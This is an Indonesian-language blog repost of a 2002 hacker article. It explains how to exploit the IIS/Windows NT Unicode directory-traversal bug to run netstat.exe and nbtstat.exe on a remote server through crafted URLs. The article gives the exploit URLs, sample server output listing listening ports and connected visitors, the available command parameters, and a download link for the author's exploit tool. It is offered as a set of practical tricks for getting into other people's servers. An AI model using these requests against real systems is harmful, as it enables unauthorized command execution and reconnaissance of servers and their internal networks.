Memeriksa jumlah koneksi server dan pemetaan jaringan lokal secara remote

July 4, 2009 at 7:50 pm Leave a comment

Memeriksa jumlah koneksi server dan pemetaan jaringan lokal secara remote
Andrian Kurniady


Oleh Andrian Kurniady
Published: May 14, 2002
Print   
Memeriksa open port pada sebuah server normalnya dilakukan dengna portscan ke server tujuan, tetapi untuk server NT dengan bug unicode, dapat dilakukan tanpa portscan dari luar.

Untuk memeriksa open port (port – port dengan status “LISTENING”, gunakan program netstat dengan parameter -a, misalnya : http://www.domain.com/scripts/..%c0%af../winnt/system32/netstat.exe?-a

Contoh hasilnya :
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Wed, 20 Mar 2002 11:13:37 GMT
Connection: close
Content-Type: application/octet-stream

Proto Local Address Foreign Address State
TCP winnt:22 winnt:0 LISTENING
TCP winnt:smtp winnt:0 LISTENING
TCP winnt:http winnt:0 LISTENING
TCP winnt:7000 winnt:0 LISTENING
TCP winnt:7100 winnt:0 LISTENING
TCP winnt:8644 winnt:0 LISTENING
TCP winnt:81 winnt:1413 ESTABLISHED
TCP winnt:1030 winnt:3306 ESTABLISHED
TCP winnt:1413 winnt:81 ESTABLISHED
TCP winnt:3306 winnt:1030 ESTABLISHED

Kadang – kadang, hasil netstat ini akan muncul setelah selang waktu tertentu, mungkin bisa sampai beberapa menit. Hasil tersebut secara otomatis juga menyertakan IP semua pengunjung yang aktif, dan koneksi yang sedang aktif (ESTABLISHED atau TIME_WAIT)

Untuk menampilkan hanya ip pengunjung / koneksi aktif, gunakan perintah netstat tanpa parameter : http://www.domain.com/scripts/..%c0%af../winnt/system32/netstat.exe?-a

Parameter lain yang dapat digunakan adalah -r (menampilkan routing table), -e, -n, -p, -s, selengkapnya dapat dilihat di help (/?)

— Melihat / memetakan Netbios / Microsoft Network server bersangkutan —

Kadang sebuah server terhubung ke dalam network, yang dapat berupa sebuah microsoft network, untuk memetakan network bersangkutan, dapat digunakan perintah nbtstat

Gunakan program nbtstat (dengan parameter -n untuk list), misalnya http://www.domain.com/scripts/..%c0%af../winnt/system32/nbtstat.exe?-n

Parameter lain yang tersedia untuk nbtstat
adalah -a, -A, -c, -n, -r, -R, -s, -S, -RR, selengkapnya dapat dilihat di help (/?)

— Penutup —

Demikian beberapa trik dari saya, semoga bermanfaat bagi rekan – rekan sekalian. Bila ada yang sudah pernah di-posting sebelumnya mohon maaf. Untuk keperluan mengeksploit unicode bug ini anda dapat menggunakan program buatan saya (bila browser dirasa terlalu rumit), bernama Madcodes RawHTTP, dapat di download dari http://channels.dal.net/madcodes/mdrhttp.exe
(terakhir versi 1.40)

_E1nste1n_ / Auror of #madcodes on DALnet

Salam dan Ucapan terima kasih :
– CyberMad, Sir_King_X, r3v0lt, P|P, dan rekan – rekan lain dari #madcodes
– X_tremes, BSD-OS, dan rekan – rekan lain dari #ganknet
– Ioxis, Semut, beserta teman – teman dari #indohacker, #indosniffing, dan lain – lain. Mohon maaf kalau ada yang lupa saya sebutkan
Â

Entry filed under: komputer. Tags: , .

Membuat flashdisk aman dari autorun-nya si-virus Mencurangi (hampir) Semua Jenis Billing Warnet

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Trackback this post  |  Subscribe to the comments via RSS Feed


Categories

Recent Posts


%d bloggers like this: